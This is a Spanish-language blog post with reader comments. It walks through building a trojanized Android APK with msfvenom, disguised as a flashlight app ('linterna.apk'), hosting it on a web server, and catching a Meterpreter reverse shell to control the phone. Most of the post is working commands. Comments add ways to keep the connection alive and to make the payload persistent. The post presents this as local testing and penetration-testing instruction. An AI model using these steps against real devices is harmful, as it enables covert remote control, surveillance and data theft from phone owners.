lunes, 16 de noviembre de 2015

Troyanizando Android con Msfvenom

Compartir este artículo:
Buenas a todos, tras la decisión del equipo de Metasploit hace ya algún tiempo de retirar msfpayload y msfencode, Msfvenom se convirtió en nuestro aliado, uniendo las capacidades de ambos, aunque con algunos pequeños cambios a la hora de utilizarlo.

Hoy, quiero centrarme en enseñaros como podéis controlar un dispositivo Android a través de Msfvenom y Msfconsole. Hace un par de años, mi compañero Pablo nos enseñaba en su artículo "Meterpreter en Android: El desembarco en tu smartphone" como podíamos realizar esta labor mediante msfpayload, pero actualmente está deprecated, por lo que hoy veremos como realizar esta misma labor con Msfvenom.

El primer paso a realizar será generar un APK malicioso que hará de agente/bot. Este software debería ser instalado en el dispositivo Android a controlar. Por ejemplo, yo realizaré las pruebas en un entorno local:
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk 
A continuación, y con el fin de facilitar la carga del APK en el móvil, levantaré un Apache2 (en Kali 2), y copiaré el APK a la carpeta raíz del servidor web:
service apache2 start
cp /root/linterna.apk /var/www/html 
El siguiente paso será iniciar msfconsole, cargar el exploit y el payload reverse_tcp de Android:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp 
Posteriormente configuraremos la dirección IP donde dejaremos el manejador escuchando y el puerto que previamente hemos indicado al bot al que se debe conectar:
set LHOST 192.168.1.50
set LPORT 4444 
Finalmente ejecutaremos la instrucción exploit:
exploit 
Ahora si instalamos el software que previamente habremos alojado en la ruta  http://192.168.1.50/linterna.apk dispondremos de control sobre el dispositivo.

Disponemos de un gran listado de comandos para interactuar con el dispositivo:




Si realizáis numerosas pruebas con él, veréis que no es 100% estable, y cuando traemos grandes cantidades de información del dispositivo suele colgarse. Pero solo tendremos que volver a abrir el APK instalado para tener control de nuevo sobre el terminal.

Saludos!

9 comentarios:

  1. Muy sencillo de utilizar, pero la verdad es que para mi no fue muy funcional ya que tengo que iniciar el apk constantemente, debido a que se desconecta:
    Meterpreter session 5 closed. Reason: Died

    ResponderEliminar
    Respuestas
    1. eso es por que tienes que migrar el proceso, coloca ps cuando estes en la consola ddel meterpreter, luego colocas migrate -(el numero del pid del proceso)asi tenras una conexion sin caida

      Eliminar
  2. en lhost metemos esa ip o la nuestra?
    y en el puerto?

    ResponderEliminar
  3. a mi nisiquiera me instala la app porfavor... ayuda my cel es sansung...

    ResponderEliminar
  4. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  5. yo lo hice todo bien, pero al momento de estar en la msfconsole le doy use exploit/multi/handler y luego set payload android/meterpreter/reverse_tcp, se supone que ya me tendria que reconocer el virus pero le doy show options para ver si esta y no me sale el autoloadandroid que hago??

    ResponderEliminar
    Respuestas
    1. type:
      :$ use multi/handler
      :$ set payload android/shell/reverse_tcp
      :$ set lhost 192.168.x.x
      :$ set lport 8888
      :$ set processinject system_server
      :$ set exploit -j

      Eliminar
  6. lo que puedes hacer es usar el venom para inyectarle codigo de mainactivity y activandola para que se incie en paralelo desde el encendido del movil

    ResponderEliminar